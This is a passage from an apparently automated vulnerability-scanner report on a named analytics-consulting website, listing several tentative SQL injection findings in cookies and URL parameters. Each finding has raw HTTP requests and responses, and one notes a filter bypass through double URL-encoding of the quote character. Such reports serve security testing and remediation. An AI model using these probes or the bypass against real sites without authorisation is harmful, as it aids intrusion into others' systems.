The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:52:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:52:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:52:27 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:52:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.123. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:47:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:47:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:47:56 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:47:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.124. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:09:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:09:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:09:23 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:09:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.125. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:56:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:56:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:57:01 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:57:01 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.126. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:04:07 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:04:07 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.127. http://www.analyticspros.com/blog/googleanalytics/95-more-dimensions-site-search-source-medium.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:28 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:15:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:15:30 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:15:30 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.128. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog'/googleanalytics/97-workshop-january-29th-dimensionator.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 06:24:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 06:24:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog''/googleanalytics/97-workshop-january-29th-dimensionator.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:24:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 326
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.129. http://www.analyticspros.com/blog/googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 01:59:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html'' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=10
